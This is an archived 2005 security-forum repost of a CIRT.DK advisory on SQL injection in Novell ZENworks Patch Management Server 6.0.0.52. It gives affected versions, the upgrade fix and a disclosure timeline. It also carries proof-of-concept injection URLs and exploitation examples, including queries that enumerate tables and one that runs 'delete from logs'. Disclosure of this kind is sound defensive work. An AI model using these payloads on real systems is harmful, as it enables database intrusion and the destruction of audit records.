邪恶八进制信息安全团队技术讨论组's Archiver

EvilOctal 2005-11-3 00:45

[转载]Novell ZENworks路径管理服务SQL injection漏洞以及测试方法

信息来源:[url]www.securiteam.com[/url]

Summary
ZENworks Suite "automates and enforces business and IT managment processes across the lifecycle of desktops, laptops, servers and handhelds to control costs, ensure security and compliance, optimize the value of IT assets across diverse server and client platforms".

The Novell ZENworks Patch Management Server is vulnerable to SQL injection in the management console.

Credit:
The information has been provided by Dennis Rand.
The original article can be found at: [url]http://www.cirt.dk/advisories/cirt-39-advisory.pdf[/url]

Details
Vulnerable Systems:
* Novell ZENworks Patch Management Server version 6.0.0.52

Immune Systems:
* Novell ZENworks Patch Management Server 6.2.2.181 or newer

Proof of Concept:
[url]http://192.168.1.10/computers/default.asp?sort=&Direction=[/url]';

Response from server: Incorrect syntax near ', @RecsPerPage=100, @FirstRec=0, @Action=0, @Search = ', @groupFilter = '.

[url]http://192.168.1.10/reports/default.asp?sort=[/url][ReportImpact_Name]&Dir=asc &SearchText=';StatusFilter=ERRR &computerFilter=187&impactFilter=29&saveFilter=save&Page=rep

Response from server: Incorrecy syntax near ', @delimiter='.

[url]http://192.168.1.10/reports/default.asp?sort=[/url][ReportImpact_Name]&Dir=asc &SearchText=CIRT.DK &StatusFilter=';&computerFilter=187&impactFilter=29 &saveFilter=save&Page=rep

Response from server: Incorrect syntax near ', @groupFilter = ', @ImpactFilter = '.

[url]http://192.168.1.10/reports/default.asp?sort=[/url][ReportImpact_Name]&Dir=asc &SearchText=CIRT.DK &StatusFilter=ERRR&computerFilter=';&impactFilter=29 &saveFilter=save&Page=rep

Response from server: Line 1: Incorrect syntax near ', @Contact_ID='.

Exploitation examples:
[url]http://192.168.1.10/computers/default.asp?sort=&Direction=;select[/url] *+from+testclient.master.dbo.sysobjects

[url]http://192.168.1.10/computers/default.asp?sort=&Direction=;select[/url] *+from+OPENQUERY+(+[testclient],+"select+@@version;+delete+from+logs")

Server 'testclient' is not configured for DATA ACCESS. [2]

[url]http://192.168.1.10/computers/default.asp?sort=&Direction=;SELECT[/url] name+FROM+sysobjects+WHERE+xtype+=+"U"

[url]http://192.168.1.10/computers/default.asp?sort=&Direction=;select[/url] *+from+OPENQUERY+(+[testclient],+"select+@@version;+delete+from+logs")

Server 'testclient' is not configured for DATA ACCESS.

Solution:
Upgrade to ZENworks Patch Management version 6.2.2.181 (or newer hot fix via your PLUS server) found at [url]http://download.novell.com.[/url]

Timeline of public disclosure:
01-10-2005 Vulnerability discovered
11-10-2005 Research completed
12-10-2005 Sent information to Novell ([email]secure@novell.com[/email])
12-10-2005 Information sent to CERT/CC ([email]cert@cert.org[/email])
12-10-2005 CERT/CC responds with VU#536300
13-10-2005 Response from Novell
27-10-2005 Public Release

页: [1]
© 1999-2008 EvilOctal Security Team